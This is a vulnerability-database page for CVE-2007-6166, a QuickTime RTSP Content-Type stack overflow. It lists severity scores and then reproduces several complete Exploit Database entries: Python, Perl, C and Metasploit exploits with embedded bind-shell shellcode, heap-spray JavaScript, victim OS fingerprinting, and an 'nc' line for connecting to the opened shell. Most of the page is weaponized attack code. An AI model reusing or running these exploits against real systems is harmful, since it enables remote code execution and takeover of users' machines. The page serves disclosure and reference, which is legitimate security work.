CVE-2007-6166 Detail

CVE-2007-6166

CVE Descriptions

Stack-based buffer overflow in Apple QuickTime before 7.3.1, as used in QuickTime Player on Windows XP and Safari on Mac OS X, allows remote Real Time Streaming Protocol (RTSP) servers to execute arbitrary code via an RTSP response with a long Content-Type header.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 4648

Publication date : 2007-11-22 23h00 +00:00
Author : h07
EDB Verified : Yes

#!/usr/bin/python # Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <[email protected]> # Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish # Details:.. # # (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n # # 0x41414141 Pointer to next SEH record # 0x42424242 SE handler # # ---------------------------------------------------------------- # Exception C0000005 (ACCESS_VIOLATION reading [42424242]) # ---------------------------------------------------------------- # EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 # ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00 # EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00 # ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # --> N/A # ---------------------------------------------------------------- ## from socket import * header = ( 'RTSP/1.0 200 OK\r\n' 'CSeq: 1\r\n' 'Date: 0x00 :P\r\n' 'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' 'Content-Type: %s\r\n' # <-- overflow 'Content-Length: %d\r\n' '\r\n') body = ( 'v=0\r\n' 'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' 's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' 'i=1.mp3\r\n' 't=0 0\r\n' 'a=tool:ciamciaramcia\r\n' 'a=type:broadcast\r\n' 'a=control:*\r\n' 'a=range:npt=0-213.077\r\n' 'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' 'a=x-qt-text-inf:1.mp3\r\n' 'm=audio 0 RTP/AVP 14\r\n' 'c=IN IP4 0.0.0.0\r\n' 'a=control:track1\r\n' ) tmp = "A" * 995 tmp += "B" * 4096 header %= (tmp, len(body)) evil = header + body s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 554)) s.listen(1) print "[+] Listening on [RTSP] 554" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(evil) raw_input("[+] Done, press enter to quit") c.close() s.close() # EoF # milw0rm.com [2007-11-23]

Exploit Database EDB-ID : 16873

Publication date : 2010-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: quicktime_rtsp_content_type.rb 10617 2010-10-09 06:55:52Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow', # Description? # Author? 'Version' => '$Revision: 10617 $', 'Platform' => 'osx', 'References' => [ [ 'CVE', '2007-6166' ], [ 'OSVDB', '40876'], [ 'BID', '26549' ], ], 'Payload' => { 'Space' => 3841, 'BadChars' => "\x00\x0a\x0d", 'MaxNops' => 0, 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0', { 'Arch' => ARCH_PPC, 'Ret' => 0x8fe3f88c, 'RetOffset' => 551, 'PayloadOffset' => 879 } ], [ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1', { 'Arch' => ARCH_PPC, 'Ret' => 0x8fe042e0, 'RetOffset' => 615, 'PayloadOffset' => 3351 } ], [ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3', { 'Arch' => ARCH_X86, 'Offset' => 307, 'Writable' => 0xa0bd0f10, # libSystem __IMPORT # The rest of these are all in libSystem __TEXT 'ret' => 0x9015d336, 'poppopret' => 0x9015d334, 'setjmp' => 0x900bc438, 'strdup' => 0x90012f40, 'jmp_eax' => 0x9014a77f } ], [ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1', { 'Arch' => ARCH_X86, 'Offset' => 307, 'Writable' => 0x8fe66448, # dyld __IMPORT # The rest of these addresses are in dyld __TEXT 'ret' => 0x8fe1ceee, 'poppopret' => 0x8fe220d7, 'setjmp' => 0x8fe1ceb0, 'strdup' => 0x8fe1cd77, 'jmp_eax' => 0x8fe01041 } ], ], 'DefaultTarget' => 2, 'DisclosureDate' => 'Nov 23 2007')) end ###### # XXX: This does not work on Tiger apparently def make_exec_payload_from_heap_stub() frag0 = "\x90" + # nop "\x58" + # pop eax "\x61" + # popa "\xc3" # ret frag1 = "\x90" + # nop "\x58" + # pop eax "\x89\xe0" + # mov eax, esp "\x83\xc0\x0c" + # add eax, byte +0xc "\x89\x44\x24\x08" + # mov [esp+0x8], eax "\xc3" # ret setjmp = target['setjmp'] writable = target['Writable'] strdup = target['strdup'] jmp_eax = target['jmp_eax'] exec_payload_from_heap_stub = frag0 + [setjmp].pack('V') + [writable + 32, writable].pack("V2") + frag1 + "X" * 20 + [setjmp].pack('V') + [writable + 24, writable, strdup, jmp_eax].pack("V4") + "X" * 4 end def on_client_connect(client) print_status("Got client connection...") if (target['Arch'] == ARCH_PPC) ret_offset = target['RetOffset'] payload_offset = target['PayloadOffset'] # Create pattern sized up to payload, since it always follows # the return address. boom = Rex::Text.pattern_create(payload_offset) boom[ret_offset, 4] = [target['Ret']].pack('N') boom[payload_offset, payload.encoded.length] = payload.encoded else boom = Rex::Text.pattern_create(327) boom[307, 4] = [target['ret']].pack('V') boom[311, 4] = [target['ret']].pack('V') boom[315, 4] = [target['poppopret']].pack('V') boom[319, 4] = [target['Writable']].pack('V') boom[323, 4] = [target['Writable']].pack('V') # # Create exec-payload-from-heap-stub, but split it in two. # The first word must be placed as the overwritten saved ebp # in the attack string. The rest is placed after the # Writable memory addresses. # magic = make_exec_payload_from_heap_stub() boom[303, 4] = magic[0, 4] boom += magic[4..-1] # # Place the payload immediately after the stub as it expects # boom += payload.encoded end body = " " header = "RTSP/1.0 200 OK\r\n"+ "CSeq: 1\r\n"+ "Content-Type: #{boom}\r\n"+ "Content-Length: #{body.length}\r\n\r\n" print_status("Sending RTSP response...") client.put(header + body) print_status("Sleeping...") select(nil,nil,nil,1) print_status("Starting handler...") handler(client) print_status("Closing client...") service.close_client(client) end end

Exploit Database EDB-ID : 6013

Publication date : 2008-07-05 22h00 +00:00
Author : krafty
EDB Verified : Yes

#!/usr/bin/perl # # quickbite.pl # # Safari + Quicktime <= 7.3 RTSP Content-Type overflow exploit # for Mac OS X (Intel) # # Tested with OS X 10.4. # On victim, browse to http://server:8080/ # Binds shell on port 4444. # # by krafty # # greets to sk, halvar, grugq, and all the ethnical hackers # extra thanks to ddz for osx hackery # sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc # sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders. # milw0rm and packetstorm rule # Bring back the days of technotronic and r00tshell! Freedom. # # Why is this exploit called "Quickbite"? Here's a dumb Apple joke: # "What's worse than biting into an apple and finding a worm?" # "Finding half a worm". use Socket; use IO::Handle; use constant MY_HTTP_PORT => 8080; $shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd"; $buf = chr(0x11) x 6000; # don't touch anything below this line $html = <<ENDHTML; <script> var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080"); var shellcode = unescape("$shellcode"); shellcode = prefix + shellcode; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; var url = "rtsp://" + location.host + "/x.mp3"; document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />"); </script> ENDHTML $rtsp_body = "v=0\r\n" . "o=- 16689332712 1 IN IP4 0.0.0.0\r\n" . "s=MPEG-1 or 2 Audio\r\n" . "i=1.mp3\r\n" . "t=0 0\r\n" . "a=tool:hello\r\n" . "a=type:broadcast\r\n" . "a=control:*\r\n" . "a=range:npt=0-213.077\r\n" . "a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" . "a=x-qt-text-inf:1.mp3\r\n" . "m=audio 0 RTP/AVP 14\r\n" . "c=IN IP4 0.0.0.0\r\n" . "a=control:track1\r\n"; $content_length = length($rtsp_body); $rtsp_header = "RTSP/1.0 200 OK\r\n" . "CSeq: 1\r\n" . "Date: 0x00 :P\r\n" . "Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" . "Content-Type: $buf\r\n" . "Content-Length: $content_length\r\n\r\n"; $rtsp = $rtsp_header . $rtsp_body; $http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n"; $| = 1; my $port = MY_HTTP_PORT; my $protocol = getprotobyname('tcp'); socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!"; setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!"; my $my_addr = sockaddr_in($port,INADDR_ANY); bind(SOCK,$my_addr) or die "bind() failed: $!"; listen(SOCK,SOMAXCONN) or die "listen() failed: $!"; warn "waiting for incoming connections on port $port...\n"; $repeat = 1; $victim = inet_aton("0.0.0.0"); while($repeat) { next unless my $remote_addr = accept(SESSION,SOCK); my ($port,$hisaddr) = sockaddr_in($remote_addr); warn "Connection from [",inet_ntoa($hisaddr),",$port]\n"; $victim = $hisaddr; SESSION->autoflush(1); $request = ""; while(<SESSION>) { $request_line = $_; $request .= $request_line; chomp($request_line); if($request_line =~ /DESCRIBE rtsp/) { $repeat = 0; } $x = length($request_line); if($x <= 1) { last; } } print STDERR $request; if($repeat) { print SESSION $http_header . $html; } else { print SESSION $rtsp; } warn "Connection from [",inet_ntoa($hisaddr),",$port] finished\n"; close SESSION; } print "Connect to ".inet_ntoa($victim).":4444 after 5 seconds\n"; print "nc -nvv ".inet_ntoa($victim)." 4444\nEnjoy!\n"; # milw0rm.com [2008-07-06]

Exploit Database EDB-ID : 4657

Publication date : 2007-11-25 23h00 +00:00
Author : muts
EDB Verified : Yes

#!/usr/bin/python ########################################################################## # http://www.offensive-security.com # Bug discovered by Krystian Kloskowski (h07) <[email protected]> # Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista # This exploit is completely "Universal" .... It has also been modded to work via url redirection ... # Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera.... # re-edited by muts and javaguru1999 to annoy Symantec # http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html # there IS NO SPOON! ########################################################################## # "With Internet Explorer versions 6 and 7, and the Safari 3 beta, # the attack appears to be prevented because standard buffer overflow # prevention processes act before any damage can be done, Florio wrote. # With Firefox, the QuickTime RTSP response is unmoderated. As a result, # the exploit works against Firefox if QuickTime is the default multimedia player, # according to Florio." ########################################################################## # Calling Quicktime via URL kicks in an Extra Exception Handler, # of which we have no control over. # By making the buffer larger than the original exploit, we can overwrite # the last exception handler, and regain control over execution. # This is indeed an evil exploit - muhaha. ########################################################################## from socket import * header = ( 'RTSP/1.0 200 OK\r\n' 'CSeq: 1\r\n' 'Date: 0x00 :P\r\n' 'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' 'Content-Type: %s\r\n' # <-- overflow 'Content-Length: %d\r\n' '\r\n') body = ( 'v=0\r\n' 'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' 's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' 'i=1.mp3\r\n' 't=0 0\r\n' 'a=tool:ciamciaramcia\r\n' 'a=type:broadcast\r\n' 'a=control:*\r\n' 'a=range:npt=0-213.077\r\n' 'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' 'a=x-qt-text-inf:1.mp3\r\n' 'm=audio 0 RTP/AVP 14\r\n' 'c=IN IP4 0.0.0.0\r\n' 'a=control:track1\r\n' ) # ExitProcess shellcode will kill browser, but keep the shell open shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41" "\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61" "\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53" "\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e" "\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46" "\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50" "\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b" "\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b" "\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69" "\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36" "\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44" "\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56" "\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74" "\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53" "\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a" "\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71" "\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78" "\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f" "\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32" "\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c" "\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33" "\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51" "\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51" "\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41" "\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e" "\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39" "\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b" "\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e" "\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38" "\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31" "\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46" "\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30" "\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73" "\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e" "\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32" "\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30" "\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e" "\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58" "\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41" "\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b" "\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b" "\x4f\x48\x56\x69\x6f\x6a\x70\x42") tmp = "A" * 987 tmp +="\xeb\x20\x90\x90" # short jump for 7.2 tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3 tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3 tmp += "\x90" * 92 tmp += shellcode tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions. header %= (tmp, len(body)) evil = header + body s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 554)) s.listen(1) print "[+] Listening on [RTSP] 554" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(evil) raw_input("[+] Done, press enter to quit") c.close() s.close() # milw0rm.com [2007-11-26]

Exploit Database EDB-ID : 4651

Publication date : 2007-11-23 23h00 +00:00
Author : InTeL
EDB Verified : Yes

/* ============================================================= Apple Quicktime (Vista/XP RSTP Response) Remote Code Exec ============================================================= Discovered by: h07 Author: InTeL *Tested on: - Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec - Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec - Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec - Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec Notes: [*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :) [*]All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules, that is how u bypass the SEH Restrictions in XP and in Vista!! so we use Addys from there. [*]There are ALOT of filtered characters so choose your shellcode wisely or you will run into Access Violations Since I didnt feel like wasting my time going through all the filtered Characters, go through it yourself. - Here are some \x4b, \x59, \x79 [*]I did hit my shellcode but b/c i havent gone through all the filtered characters i got an Access Violation in the shellcode [*]Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs [***]Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit. http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html cough use w/ an iframe cough Shoutz: UIA, u kno who u ppl are */ #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #pragma comment(lib,"wsock32.lib") int info(); #define port 554 char header_part1[] = "RTSP/1.0 200 OK\r\n" "CSeq: 1\r\n" "Date: 0x00 :P\r\n" "Content-Base: rtsp://0.0.0.0/1.mp3/\r\n" "Content-Type: "; char header_part2[] = "Content-Length: "; char body[] = "v=0\r\n" "o=- 16689332712 1 IN IP4 0.0.0.0\r\n" "s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n" "i=1.mp3\r\n" "t=0 0\r\n" "a=tool:ciamciaramcia\r\n" "a=type:broadcast\r\n" "a=control:*\r\n" "a=range:npt=0-213.077\r\n" "a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n" "a=x-qt-text-inf:1.mp3\r\n" "m=audio 0 RTP/AVP 14\r\n" "c=IN IP4 0.0.0.0\r\n" "a=control:track1\r\n"; //Place Your Shellcode here but keep the name char scode[] = "\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7" "\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15" "\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f" "\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7" "\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42" "\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a" "\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30" "\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6" "\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35" "\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96"; int main(int argc, char *argv[]) { char evilbuf[5200], recvbuf[512]; char *strptr = NULL; char contentlength[] = "327"; int i, pos; struct sockaddr_in saddr; WSADATA wsaData; SOCKET sock, vicsock; info(); if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){ printf("Unable to initialize Winsock \n"); exit(1); } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { printf("Socket Error \n"); WSACleanup(); exit(1); } memset(&saddr, 0, sizeof(saddr)); saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = INADDR_ANY; saddr.sin_port = htons(port); if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) { printf("Bind Error \r\n"); closesocket(sock); WSACleanup(); exit(1); } if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) { printf("Listen Error \r\n"); closesocket(sock); WSACleanup(); exit(1); } printf("[+] Listening on port: %d\r\n", port); if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) { printf("[+]Victim Connected \r\n"); memset(recvbuf,0,sizeof(recvbuf)); recv(vicsock, recvbuf, 512, 0); memset(evilbuf, '\0', sizeof(evilbuf)); strcpy(evilbuf, header_part1); /*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/ if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista strptr = NULL; if((strptr =strstr(recvbuf, "7.3")) != NULL) { printf("Victim is running Vista and QKTime Version 7.3\r\n"); pos = strlen(header_part1); for(i = 1; i<=991;i++) { evilbuf[pos] = 'A'; pos++; } strcat(evilbuf, "\xeb\x32\x90\x90"); strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx pos += 8; } else { strptr = NULL; if((strptr =strstr(recvbuf, "7.2")) != NULL) { printf("Victim is running Vista and QKTime Version 7.2\r\n"); pos = strlen(header_part1); for(i = 1; i<=987;i++) { evilbuf[pos] = 'A'; pos++; } strcat(evilbuf, "\xeb\x32\x90\x90"); strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx pos += 8; } } } else { //Win XP SP2 strptr = NULL; if((strptr = strstr(recvbuf, "5.1")) != NULL) { strptr = NULL; if((strptr =strstr(recvbuf, "Pack 2")) != NULL) { strptr = NULL; if((strptr =strstr(recvbuf, "7.3")) != NULL) { printf("Victim is running XP SP2 and QKTime Version 7.3\r\n"); pos = strlen(header_part1); for(i = 1; i<=991;i++) { evilbuf[pos] = 'A'; pos++; } strcat(evilbuf, "\xeb\x32\x90\x90"); strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx pos += 8; } else{ strptr = NULL; if((strptr =strstr(recvbuf, "7.2")) != NULL) { printf("Victim is running XP SP2 and QKTime Version 7.2\r\n"); pos = strlen(header_part1); for(i = 1; i<=987;i++) { evilbuf[pos] = 'A'; pos++; } strcat(evilbuf, "\xeb\x32\x90\x90"); strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx pos += 8; } } } } else { printf("[-] Not a Valid Target, Shutting Down"); closesocket(vicsock); closesocket(sock); WSACleanup(); exit(1); } } for(i=0; i<200;i++) { evilbuf[pos] = '\x90'; pos++; } for(i=0; i<strlen(scode);i++){ evilbuf[pos] = scode[i]; pos++; } int rest = 4096-(200+strlen(scode)); for(i=0; i<rest;i++) { evilbuf[pos] = '\x90'; pos++; } strcat(evilbuf, "\r\n"); pos +=2; for(i = 0; i<sizeof(header_part2);i++) { evilbuf[pos] = header_part2[i]; pos++; } strcat(evilbuf, contentlength); strcat(evilbuf, "\r\n"); Sleep(1); strcat(evilbuf, "\r\n"); pos +=8; strcat(evilbuf, body); printf("%s", evilbuf); printf("[+] Evil Packet Generated \r\n"); if(send(vicsock, evilbuf, strlen(evilbuf), 0) != SOCKET_ERROR) printf("[+] Evil Packet Sent \r\n"); else printf("[-] Evil Packet Sending Failed \r\n"); closesocket(vicsock); closesocket(sock); WSACleanup(); } else { printf("Accept failed"); closesocket(sock); WSACleanup(); } return 0; } int info() { printf("[+]Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit\r\n"); printf("[+]Author: InTeL\r\n"); printf("[+]Tested on:\r\n\t- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec\r\n\t- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec\r\n\t- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\r\n\t- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\r\n"); printf("[+]Shout to: UIA, you kno who u ppl are\r\n\r\n"); return 0; } // milw0rm.com [2007-11-24]

Exploit Database EDB-ID : 4664

Publication date : 2007-11-26 23h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes

___ Everyone Loves O|0_+|O the Hypnotoad... |...| | | =o0O=====O0o=============================== | QuickTime RTSP Response Content-type | | remote stack rewrite exploit for IE 6/7 | | by Yag Kohha (skyhole [at] gmail.com) | =========================================== Exploit tested on: - Windows Vista - Windows XP SP2 - IE 6.0/ 7.0 - QT 7.2/ 7.3 Exploit requirements: Target: Windows Vista/ XP SP2 , IE 6.0/7.0, QT 7.2/7.3 Server: Linux, Perl, Apache web- server Whats inside: index.html - hypertext document with heap spray javascript and QT plugin call with playlist.mov (place to public web-folder) server - rtsp- server emulator (run in your linux shell in background mode "./server&") playlist.mov - play list with rtsp server link (edit "_server_emulator_ip" with address of rtsp-server emulator started and place to public web-folder) Try to load index.html in your browser from remote web- server with installed exploit. Greetz 2: - str0ke & milw0rm - shinnai - h07 for bug publication - muts & InTel for code play'ng ( but guyz, U`rs releases coded with SEH overwrite... It's so many problems with shellcode modification and stable exploitation on different systems... for whats? We can overwrite EIP with buffer generation like 65535 bytes. In this release EIP -> 0x0c0c0c0c ) Fuckz 2: - wslabi.com (too stupid resource for selling shit) - ICEPACK and MPACK coderz (Fucking javascript kidd0z and code thiefz) https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz) # milw0rm.com [2007-11-27]

Exploit Database EDB-ID : 11027

Publication date : 2010-01-05 23h00 +00:00
Author : jacky
EDB Verified : Yes

